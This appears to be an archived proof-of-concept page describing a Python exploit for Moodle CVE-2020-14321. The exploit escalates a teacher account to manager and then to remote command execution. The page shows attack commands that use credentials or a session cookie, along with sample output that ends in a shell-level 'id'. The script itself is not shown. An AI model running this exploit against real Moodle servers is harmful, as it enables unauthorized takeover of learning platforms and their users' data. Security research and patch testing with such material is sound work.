Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-14321 PoC — Moodle 权限许可和访问控制问题漏洞

Source
https://github.com/lanzt/CVE-2020-14321
Associated Vulnerability
Title:Moodle 权限许可和访问控制问题漏洞 (CVE-2020-14321)
Description:Moodle是一套免费、开源的电子学习软件平台,也称课程管理系统、学习管理系统或虚拟学习环境。 Moodle中存在权限许可和访问控制问题漏洞,该漏洞源于程序在课程注册中没有进行正确的安全限制。远程攻击者可利用该漏洞提升权限。以下产品及版本受到影响:Moodle 3.5.0版本至3.5.12版本,3.7.0版本至3.7.6版本,3.8.0版本至3.8.3版本,3.9.0版本。
Description
Python script to exploit CVE-2020-14321 - Moodle 3.9 - Course enrollments allowed privilege escalation from teacher role into manager role to RCE.
Readme
Python script to exploit [CVE-2020-14321](https://moodle.org/mod/forum/discuss.php?d=407393) - **Moodle 3.9** 

Course enrolments allowed privilege escalation from teacher role into manager role to RCE.

* Teachers of a course were able to assign themselves the manager role within that course.

Payload extracted from: https://github.com/HoangKien1020/CVE-2020-14321

## Usage

If you have valid teacher credentials (InReaLife this has not been tested enough, or maybe yes, I don't know :P):

```bash
❭ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle -u lanz -p 'Lanz123$!'
```

If you have a valid teacher cookie (**101% tested**):

```bash
❱ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle --cookie th3f7k1ngggk00ci30ft3ach3r
```

...

```bash
❱ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle --cookie th3f7k1ngggk00ci30ft3ach3r -c id
 __     __     __   __  __   __              __  __     
/  \  /|_  __   _) /  \  _) /  \ __  /| |__|  _)  _) /| 
\__ \/ |__     /__ \__/ /__ \__/      |    | __) /__  | • by lanz

Moodle 3.9 - Remote Command Execution (Authenticated as teacher)
Course enrolments allowed privilege escalation from teacher role into manager role to RCE
                                                        
[+] Login on site: MoodleSession:th3f7k1ngggk00ci30ft3ach3r ✓
[+] Updating roles to move on manager accout: ✓
[+] Updating rol manager to enable install plugins: ✓
[+] Uploading malicious .zip file: ✓
[+] Executing id: ✓

uid=80(www) gid=80(www) groups=80(www)
```

Keep breaking ev3rYthiNg!!
File Snapshot

 [4.0K]  /data/pocs/c26413b45d1e44a84941247299ee9fa0a240ecc5
├── [ 38K]  CVE-2020-14321_RCE.py
└── [1.5K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.